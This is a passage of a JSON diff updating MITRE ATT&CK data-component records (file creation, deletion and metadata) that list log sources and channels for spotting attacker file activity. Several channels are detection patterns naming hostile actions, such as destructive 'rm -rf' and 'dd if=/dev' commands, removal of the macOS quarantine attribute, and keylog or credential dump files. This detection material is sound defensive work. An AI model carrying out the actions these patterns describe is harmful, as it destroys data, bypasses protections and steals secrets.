+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip, .gz, .dmg archives in /Users, /tmp, or application directories"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file open/write"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "ES_EVENT_TYPE_NOTIFY_CREATE: path under /Users/*/(Downloads|Desktop|Library/*/Containers|Library/Group Containers) AND extension in SuspiciousExtensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open/create/rename: name in (/home/*/Downloads/*|/tmp/*|/run/user/*|/media/*) AND ext in SuspiciousExtensions"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of archive files in /tmp, /var/tmp, or user home directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip, .dmg, .tar.gz files in /Users, /tmp, or application directories"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File Events"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "File creations of *.qcow2, *.vdi, *.vmdk outside standard VM directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation or modification of postinstall scripts within .pkg or .mpkg contents"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open: File creation under /tmp, /var/tmp, ~/.cache with executable bit or shell shebang"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "create: New files in /tmp or ~/Library/Application Support/* with executable or script extensions"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open, write, unlink"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "File creation of suspicious scripts/binaries in temporary directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation of unsigned binaries/scripts in user cache or download directories"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "File creation events in /var/mail or /var/spool/mail exceeding baseline thresholds"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "create: Attachment file creation in ~/Library/Mail directories"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Shell-Core",
+                            "channel": "New startup folder shortcut or binary placed in Startup directory"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "write or create file after .bash_history access"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "new file created in /var/www/html, /srv/http, or similar web root"
+                        },
+                        {
+                            "name": "fs:launchdaemons",
+                            "channel": "file_create"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "mount target path within /proc/*"
+                        },
+                        {
+                            "name": "macos:fsevents",
+                            "channel": "/Library/StartupItems/, ~/Library/LaunchAgents/"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "write or chmod to ~/Library/LaunchAgents/*.plist"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "creation of .so files in non-standard directories (e.g., /tmp, /home/*)"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of files with anomalous headers and entropy levels in /tmp or user directories"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of files with anomalous headers and entropy values"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Access or modification to /lib/modules or creation of .ko files"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "Directory events (kFSEventStreamEventFlagItemCreated)"
+                        },
+                        {
+                            "name": "gcp:workspaceaudit",
+                            "channel": "drive.activity logs"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "create/write/rename in user-writable paths"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "WRITE: Drop of binaries/scripts in ~/.local, /tmp, or /opt tool dirs"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE/MODIFY: Creation of LaunchAgents/Daemons plists in user/system locations"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,create"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "Creation of hidden files (.*) in sensitive directories (/etc, /var, /usr/bin)"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of LaunchAgents/LaunchDaemons in hidden or non-standard directories"
+                        },
+                        {
+                            "name": "auditd:FILE",
+                            "channel": "create: Creation of files ending in .tar, .gz, .bz2, .zip in /tmp or /var/tmp"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of .zip or .dmg files in user-accessible or temporary directories"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "file write"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_open"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "file create or modify in /etc/emond.d/rules or /private/var/db/emondClients"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "open,creat,rename,write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Writes under ~/Library/Application Support/Code*/extensions or JetBrains plugins"
+                        },
+                        {
+                            "name": "AWS:CloudTrail",
+                            "channel": "PutObject"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "App UID writes new file with suspicious extension/location (.tmp, .dat, .enc, /data/data/<pkg>/files/, /sdcard/Download/) and high estimated entropy"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "NSFileHandle/NSFileManager writes creating high-entropy files within app container (/var/mobile/Containers/Data/Application/<GUID>/tmp|Library/Caches)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "App UID writes edited media to container paths (e.g., /data/data/<pkg>/files/, .../cache/, /storage/emulated/0/Pictures/<pkg>/) with high delta in size vs. original and elevated estimated segment entropy  "
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Create/write of high-entropy files in /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/<...> with .dex/.so/.jar/.tmp/.bin"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write of high-entropy Mach-O/bundle or generic blob in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "Create/write under /data/data/<pkg>/(files|cache)/ or /storage/emulated/0/ with extension .dex/.jar/.so/.zip/.tmp/.js and elevated entropy"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "Create/write in /var/mobile/Containers/Data/Application/<GUID>/(tmp|Library/Caches)/ for .js/.bundle/.dylib/.zip with elevated entropy"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE of archive or container (.zip/.gz/.7z/.db copy) that aggregates files pulled from other-package paths"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of archive/container (.zip/.gz/.7z/.db export) aggregating recently read items"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to app-writable DB/file path indicating clipboard dump (e.g., clipboard.db, clip_*.txt)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of clipboard dump artifacts in container (clipboard.db, clip_*.txt, caches)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE paths like /data/data/<pkg>/files/(keys|inputs)/.*\\\\.db|\\\\.txt|\\\\.log"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE clipboard/keylog artifacts (clipboard.db, keys_*.txt) in container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(keys|inputs|clipboard).*\\\\.(db|sqlite|txt|log)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of keylog artifacts (keys_*.txt, inputs.db) within app/keyboard container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE to /data/data/<pkg>/(files|databases)/(creds|form|prompt).*\\\\.(db|sqlite|json|txt)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of form cache/credential-like artifacts (forms.db, creds.json) in container"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(app_inventory|pkg_list).*\\\\.(json|txt|db)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE container paths like /Library/Caches/app_inventory.*\\\\.(json|plist|db)"
+                        },
+                        {
+                            "name": "android:logcat",
+                            "channel": "CREATE/WRITE /data/data/<pkg>/(files|databases)/(security_inventory|policy_audit).*\\\\.(json|txt|db|plist)"
+                        },
+                        {
+                            "name": "iOS:unifiedlog",
+                            "channel": "CREATE/WRITE of /Library/Caches/security_inventory.*\\\\.(json|plist|db)"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Browser/WebView process creates downloaded payloads, temporary files, dropped archives, or unusual cached web artifacts shortly after visiting external content"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "File writes from removable-media or USB-associated paths into download, package staging, temp, or application-accessible storage shortly after USB connection"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "large file write originating from /mnt/usb or external mounted storage"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Recently installed or updated trusted app writes staging, cache, buffer, or export artifacts inconsistent with its approved function, especially when temporally adjacent to sensitive resource access or outbound transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App stages, buffers, caches, or exports data locally immediately before communication with legitimate external web-service endpoints in a way inconsistent with normal sync or offline workflow"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to cache, buffer, temp, staging, or export path occurred between inbound retrieval and outbound write to same public web-service class"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Burst write to media, cache, temp, export, or staging path occurred during or immediately after camera session from same app identity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes encoded/encrypted blobs (high entropy data) to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes high-entropy encrypted blobs to local storage or memory buffers prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "App writes asymmetric-encrypted blobs or encoded ciphertext to local buffers or files prior to transmission"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application reads multiple user-data files, media objects, message stores, or app-private records in burst sequence immediately before packaging or encryption activity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes archive-like container or high-entropy packaged blob to app storage, cache, temp path, or shared external path after burst collection activity"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes new large container, temp package, or high-entropy blob after clustered local data access and before outbound communication"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application performs burst reads across local system paths, external storage, media directories, cache locations, or local database files within a short interval as the primary collection phase"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Application writes newly retrieved binary, archive, script-like asset, overlay content, library, or opaque payload to app-private, cache, temp, or shared external path as the primary local effect of transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "Managed app writes newly retrieved container-local asset, dylib-like resource, archive, or opaque payload shortly after remote retrieval as the strongest local effect"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "APK, DEX, native library, or package-associated executable content is written, expanded, or swapped in app package paths, staging paths, or installer cache immediately before or during application replacement"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application modifies protected configuration, local control files, security settings, or tool-related data immediately before security service degradation or non-reporting state"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.770000+00:00\", \"old_value\": \"2026-04-23 17:17:05.280000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--e905dad2-00d6-477c-97e8-800427abd0e8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.778000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0040",
+                            "external_id": "DC0040"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Deletion",
+                    "description": "Refers to events where files are removed from a system or storage device. These events can indicate legitimate housekeeping activities or malicious actions such as attackers attempting to cover their tracks. Monitoring file deletions helps organizations identify unauthorized or suspicious activities.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink/unlinkat on service binaries or data targets"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file deletion"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "shell history"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=23"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "esxi:shell",
+                            "channel": "/var/log/shell.log"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "delete action"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, unlinkat, openat, write"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "exec rm -rf|dd if=/dev|srm|file unlink"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, unlinkat, rmdir"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink, rename, open"
+                        },
+                        {
+                            "name": "linux:Sysmon",
+                            "channel": "EventCode=23"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "unlink, fs_delete"
+                        },
+                        {
+                            "name": "docker:daemon",
+                            "channel": "container file operations"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "rm, clearlogs, logrotate"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "Datastore file operations"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "CREATE, DELETE, WRITE: Stored data manipulation attempts by unauthorized processes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "unlink/unlinkat"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Backup",
+                            "channel": "Windows Backup Catalog deletion or catalog corruption"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "/etc/fstab, /etc/systemd/*"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, alters, renames, relocates, or suppresses local artifacts relevant to detection, including files, hidden media, compromise markers, or app-local evidence, before later continued execution or transfer"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes package files, cleanup artifacts, or app-local state immediately before disappearance from installed inventory or runtime"
+                        },
+                        {
+                            "name": "MobileEDR:telemetry",
+                            "channel": "application deletes, truncates, or removes user, operational, or evidence-bearing files after prior access or staging and before later continued execution or communication"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "3.0",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.778000+00:00\", \"old_value\": \"2026-04-23 18:19:16.114000+00:00\"}}}",
+                    "previous_version": "3.0"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.774000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0059",
+                            "external_id": "DC0059"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Metadata",
+                    "description": "contextual information about a file, including attributes such as the file's name, size, type, content (e.g., signatures, headers, media), user/owner, permissions, timestamps, and other related properties. File metadata provides insights into a file's characteristics and can be used to detect malicious activity, unauthorized modifications, or other anomalies. Examples: \n\n- File Ownership and Permissions: Checking the owner and permissions of a critical configuration file like /etc/passwd on Linux or C:\\Windows\\System32\\config\\SAM on Windows.\n- Timestamps: Analyzing the creation, modification, and access timestamps of a file.\n- File Content and Signatures: Extracting the headers of an executable file to verify its signature or detect packing/obfuscation.\n- File Attributes: Analyzing attributes like hidden, system, or read-only flags in Windows.\n- File Hashes: Generating MD5, SHA-1, or SHA-256 hashes of files to compare against threat intelligence feeds.\n- File Location: Monitoring files located in unusual directories or paths, such as temporary or user folders.",
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_log_sources": [
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "stat and lstat syscall results on files, including inode and permission info"
+                        },
+                        {
+                            "name": "AndroidLogs:Framework",
+                            "channel": "BroadcastReceiver registration for android.intent.action.BOOT_COMPLETED by previously unseen or recently installed apps"
+                        },
+                        {
+                            "name": "auditd:CONFIG_CHANGE",
+                            "channel": "chmod or chown of hook files indicating privilege escalation or execution permission change"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file path matches exclusion directories"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:PATH",
+                            "channel": "file path modifications on critical system directories (/etc, /usr/bin, /usr/sbin, /var, /opt)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "Inotify watch creation or auditctl changes on /etc/cron* or /lib/systemd/system/"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "PATH"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "file write after sleep delay"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, setxattr, lsetxattr, fsetxattr)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setuid or setgid bit changes"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "syscall in (chmod, fchmod, fchmodat, chown, fchown, fchownat, lchown, setxattr, lsetxattr, fsetxattr, removexattr, lremovexattr, fremovexattr)"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "setxattr or getxattr system call"
+                        },
+                        {
+                            "name": "auditd:SYSCALL",
+                            "channel": "chmod, chown, setxattr, or file writes to /etc/ssl/* or /usr/local/share/ca-certificates/*"
+                        },
+                        {
+                            "name": "ebpf:syscalls",
+                            "channel": "Unexpected container volume unmount + file deletion"
+                        },
+                        {
+                            "name": "EDR:detection",
+                            "channel": "App reputation telemetry"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "File Metadata Inspection (Low String Entropy, Missing PDB)"
+                        },
+                        {
+                            "name": "EDR:file",
+                            "channel": "File Metadata Analysis (PE overlays, entropy)"
+                        },
+                        {
+                            "name": "esxi:hostd",
+                            "channel": "host daemon events related to file or VM permission changes"
+                        },
+                        {
+                            "name": "esxi:syslog",
+                            "channel": "Datastore file hidden or renamed unexpectedly"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Upload of file to datastore"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Storage access and file ops"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "VMware kernel events for file system permission modifications"
+                        },
+                        {
+                            "name": "esxi:vmkernel",
+                            "channel": "Datastore modification events"
+                        },
+                        {
+                            "name": "File",
+                            "channel": "None"
+                        },
+                        {
+                            "name": "fs:fileevents",
+                            "channel": "/var/log/install.log"
+                        },
+                        {
+                            "name": "fs:filesystem",
+                            "channel": "Binary file hash changes outside of update/patch cycles"
+                        },
+                        {
+                            "name": "fs:fsevents",
+                            "channel": "file system events indicating permission or attribute changes"
+                        },
+                        {
+                            "name": "fs:fsusage",
+                            "channel": "filesystem monitoring of exec/open"
+                        },
+                        {
+                            "name": "fwupd:logs",
+                            "channel": "Firmware updates applied or failed"
+                        },
+                        {
+                            "name": "gatekeeper/quarantine database",
+                            "channel": "LaunchServices quarantine"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt or yum/dnf transaction logs (install/update of build tools)"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt/yum/dnf transaction logs; vendor updaters in systemd journals"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "dpkg/apt install, remove, upgrade events"
+                        },
+                        {
+                            "name": "journald:package",
+                            "channel": "yum/dnf install or update transactions"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "event-based"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events, hash"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "hash, elf_info, file_metadata"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "elf_info, hash, yara_matches"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Read headers and detect MIME type mismatch"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "file_events.path"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Filesystem modifications to trusted paths"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "Write or modify .desktop file in XDG autostart path"
+                        },
+                        {
+                            "name": "linux:osquery",
+                            "channel": "hash, rpm_packages, deb_packages, file_events"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "Discrepancies in _VBA_PROJECT p-code vs source code extracted with oletools/pcodedmp"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "application or system execution logs"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "file permission modification events in kernel messages"
+                        },
+                        {
+                            "name": "linux:syslog",
+                            "channel": "kernel messages related to file system permission changes and security violations"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_file_rename_t or es_event_file_write_t"
+                        },
+                        {
+                            "name": "macos:endpointsecurity",
+                            "channel": "es_event_authentication"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "code_signing, file_metadata"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "file_events"
+                        },
+                        {
+                            "name": "macos:osquery",
+                            "channel": "mach_o_info, file_metadata"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "softwareupdated/homebrew/install logs, pkginstalld events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "AMFI or Gatekeeper signature/notarization failures for newly installed dev components"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Detection of altered _VBA_PROJECT or PerformanceCache streams"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem:syspolicyd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File metadata updated with UF_HIDDEN flag"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code signature validation fails or is absent post-binary modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Code signing verification failures or bypassed trust decisions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Creation of new LaunchAgent or LoginItem plist files in ~/Library/LaunchAgents/"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "filesystem events"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "xattr -d com.apple.quarantine or similar attribute removal commands"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Gatekeeper quarantine policy decision anomalies recorded in com.apple.LaunchServices.QuarantineEventsV2"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "pkginstalld/softwareupdated/Homebrew install transactions"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "AMFI/Gatekeeper code signature or notarization failures"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "kernel extension and system extension logs related to file system security violations or SIP bypass attempts"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Unexpected application binary modifications or altered signing status"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "extended attribute write or modification"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "New certificate trust settings added by unexpected process"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "subsystem=com.apple.lsd"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "installer or system_installd 'PackageKit: install succeeded/failed' with non-notarized or unknown signer"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "Gatekeeper/AMFI 'code signature invalid' / 'not notarized' messages"
+                        },
+                        {
+                            "name": "macos:unifiedlog",
+                            "channel": "File creation or modification with com.apple.ResourceFork extended attribute"
+                        },
+                        {
+                            "name": "networkdevice:syslog",
+                            "channel": "OS version query results inconsistent with expected or approved version list"
+                        },
+                        {
+                            "name": "NSM:Flow",
+                            "channel": "Observed File Transfers"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for file permission modifications"
+                        },
+                        {
+                            "name": "OpenBSM:AuditTrail",
+                            "channel": "BSM audit events for file permission, ownership, and attribute modifications with user context"
+                        },
+                        {
+                            "name": "saas:RepoEvents",
+                            "channel": "New file added or modified in PR targeting CI/CD or build config (e.g., `gitlab-ci.yml`, `build.gradle`, `pom.xml`, `.github/workflows/*.yml`)"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Invalid/Unsigned image when developer tool launches newly installed binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Unsigned or invalid image for newly installed/updated binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "Code integrity violations in boot-start drivers or firmware"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-CodeIntegrity/Operational",
+                            "channel": "CodeIntegrity reports 'Invalid image hash' or 'Unsigned image' for new/updated binaries"
+                        },
+                        {
+                            "name": "WinEventLog:Microsoft-Windows-Windows Defender/Operational",
+                            "channel": "SmartScreen or ASR blocks on newly downloaded installer/updater"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4670, 4656"
+                        },
+                        {
+                            "name": "WinEventLog:Security",
+                            "channel": "EventCode=4663, 4656, 4658"
+                        },
+                        {
+                            "name": "WinEventLog:Setup",
+                            "channel": "MSI/Product install, repair or update events"
+                        },
+                        {
+                            "name": "WinEventLog:Sysmon",
+                            "channel": "EventCode=15"
+                        },
+                        {
+                            "name": "WinEventLog:Windows Defender",
+                            "channel": "Operational log"
+                        },
+                        {
+                            "name": "WinEventLog:Windows Defender",
+                            "channel": "Operational"
+                        }
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "2.1",
+                    "x_mitre_domains": [
+                        "ics-attack",
+                        "enterprise-attack",
+                        "mobile-attack"
+                    ],
+                    "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-05-12 15:12:00.774000+00:00\", \"old_value\": \"2026-04-23 18:33:47.956000+00:00\"}}}",
+                    "previous_version": "2.1"
+                },
+                {
+                    "type": "x-mitre-data-component",
+                    "id": "x-mitre-data-component--84572de3-9583-4c73-aabd-06ea88123dd8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2021-10-20 15:05:19.273000+00:00",
+                    "modified": "2026-05-12 15:12:00.775000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/datacomponents/DC0061",
+                            "external_id": "DC0061"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "File Modification",
